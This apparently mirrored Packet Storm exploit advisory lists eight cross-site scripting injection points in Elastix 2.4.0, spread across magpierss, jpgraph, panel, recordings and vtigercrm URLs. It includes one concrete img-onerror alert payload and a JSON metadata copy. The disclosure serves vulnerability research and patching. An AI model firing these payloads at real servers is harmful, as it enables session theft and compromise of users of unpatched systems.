Search...

Elastix 2.4.0 Cross Site Scripting

2013-11-17T00:00:00

ID PACKETSTORM:124045
Type packetstorm
Reporter Bassem
Modified 2013-11-17T00:00:00

Description

                                        
                                            `# Exploit Title: Elastix 2.4.0 Multiple XSS  
# Date: [ 17 Nov 2013 ]  
# Author: Bassem - Unshield Team  
# Contact: Security[at]unshield[dot]net  
# Software Link: [http://www.elastix.org/]  
# Version: 2.4.0 , works for same libs exist also on Elastix 3.0.0 Alpha   
# Tested on: 2.4.0  
  
1)http://elastix-server/libs/magpierss/scripts/magpie_debug.php?url=[XSS]  
2)http://elastix-server/libs/magpierss/scripts/magpie_slashbox.php?rss_url=[XSS]  
3)http://elastix-server/panel/flash/mypage.php?clid=[XSS]  
4)http://elastix-server/panel/flash/mypage.php?clid=0&clidname=[base64(XSS)]  
5)http://elastix-server/recordings/index.php?login='&gt;[XSS]  
6)http://elastix-server/libs/jpgraph/Examples/show-image.php?target="&gt;&lt;IMg+srC%3D+x+OnerRoR+%3D+alert(0)&gt;  
7)http://elastix-server/vtigercrm/modules/Mobile/index.php?_operation=[XSS]  
8)http://elastix-server/vtigercrm/vtigerservice.php?service=[XSS]  
  
Regards/Cordialement  
UNSHIELD TEAM  
`

JSON Vulners Source

Initial Source

{"type": "packetstorm", "published": "2013-11-17T00:00:00", "reporter": "Bassem", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "81dd8583958c6a0383354c534088dc2e"}, {"key": "modified", "hash": "31685687dbec3fe4df89efc0b6dcbc70"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "31685687dbec3fe4df89efc0b6dcbc70"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "18bd7d3324d824ed688c51aa7233c936"}, {"key": "sourceData", "hash": "2ae81a36c496dbc307aa5ba8b160d53d"}, {"key": "sourceHref", "hash": "2456e7b614dc92ac085407a4e656e61c"}, {"key": "title", "hash": "a096d7c8623efb6c6002c7c9db0551da"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`# Exploit Title: Elastix 2.4.0 Multiple XSS \n# Date: [ 17 Nov 2013 ] \n# Author: Bassem - Unshield Team \n# Contact: Security[at]unshield[dot]net \n# Software Link: [http://www.elastix.org/] \n# Version: 2.4.0 , works for same libs exist also on Elastix 3.0.0 Alpha \n# Tested on: 2.4.0 \n \n1)http://elastix-server/libs/magpierss/scripts/magpie_debug.php?url=[XSS] \n2)http://elastix-server/libs/magpierss/scripts/magpie_slashbox.php?rss_url=[XSS] \n3)http://elastix-server/panel/flash/mypage.php?clid=[XSS] \n4)http://elastix-server/panel/flash/mypage.php?clid=0&clidname=[base64(XSS)] \n5)http://elastix-server/recordings/index.php?login='>[XSS] \n6)http://elastix-server/libs/jpgraph/Examples/show-image.php?target=\"><IMg+srC%3D+x+OnerRoR+%3D+alert(0)> \n7)http://elastix-server/vtigercrm/modules/Mobile/index.php?_operation=[XSS] \n8)http://elastix-server/vtigercrm/vtigerservice.php?service=[XSS] \n \nRegards/Cordialement \nUNSHIELD TEAM \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:22:53", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/124045/Elastix-2.4.0-Cross-Site-Scripting.html", "sourceHref": "https://packetstormsecurity.com/files/download/124045/elastix240-multiplexss.txt", "title": "Elastix 2.4.0 Cross Site Scripting", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-11-03T10:22:53"}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:53"}, "vulnersScore": 0.0}, "references": [], "id": "PACKETSTORM:124045", "hash": "9db970c1482253f2e44fe64bb45adfb5878a70f1ea91a7684b7080221d0fc66f", "edition": 1, "cvelist": [], "modified": "2013-11-17T00:00:00", "description": ""}